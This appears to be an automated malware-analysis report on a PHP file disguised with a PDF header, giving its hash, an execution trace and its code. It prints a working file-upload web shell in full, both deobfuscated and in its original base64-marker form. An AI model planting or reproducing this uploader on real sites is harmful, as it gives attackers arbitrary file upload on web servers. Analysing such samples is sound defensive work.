PHP Malware Analysis

updarurat.PhTml

md5: 7ffbf0b4b1f38920ab519fd8909342c9

Attributes

Encoding

Files

Input


Deobfuscated PHP code

%PDF-1.4
%âãÏÓ
191 0 obj
<</Linearized 1/L 171891/O 193/E 57322/N 2/T 167950/H [ 1036 257]>>
endobj

<?php 
print_r("SH3LLF0UND");
if ($_POST) {
    if (@copy($_FILES["0"]["tmp_name"], $_FILES["0"]["name"])) {
        echo "Y";
    } else {
        echo "N";
    }
} else {
    echo "<form method=post enctype=multipart/form-data><input type=file name=0><input name=0 type=submit value=up>";
}

Execution traces

data/traces/7ffbf0b4b1f38920ab519fd8909342c9_trace-1676251870.5891.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 23:31:36.486958]
1	0	1	0.000150	393576
1	3	0	0.000227	396016	{main}	1		/var/www/html/uploads/updarurat.PhTml	0	0
2	4	0	0.000253	396016	base64_decode	0		/var/www/html/uploads/updarurat.PhTml	7	1	'U0gzTExGMFVORA=='
2	4	1	0.000277	396096
2	4	R			'SH3LLF0UND'
2	5	0	0.000301	396064	print_r	0		/var/www/html/uploads/updarurat.PhTml	7	1	'SH3LLF0UND'
2	5	1	0.000321	396096
2	5	R			TRUE
1	3	1	0.000343	396016
			0.000379	314264
TRACE END   [2023-02-12 23:31:36.487224]


Generated HTML code

<html><head></head><body>%PDF-1.4
%âãÏÓ
191 0 obj
&lt;&gt;
endobj

SH3LLF0UND<form method="post" enctype="multipart/form-data"><input type="file" name="0"><input name="0" type="submit" value="up"></form></body></html>

Original PHP code

%PDF-1.4
%âãÏÓ
191 0 obj
<</Linearized 1/L 171891/O 193/E 57322/N 2/T 167950/H [ 1036 257]>>
endobj

<?php print_r(base64_decode('U0gzTExGMFVORA==')); if($_POST){if(@copy($_FILES["0"]["tmp_name"],$_FILES["0"]["name"])){echo"Y";}else{echo"N";}}else{echo"<form method=post enctype=multipart/form-data><input type=file name=0><input name=0 type=submit value=up>";}?>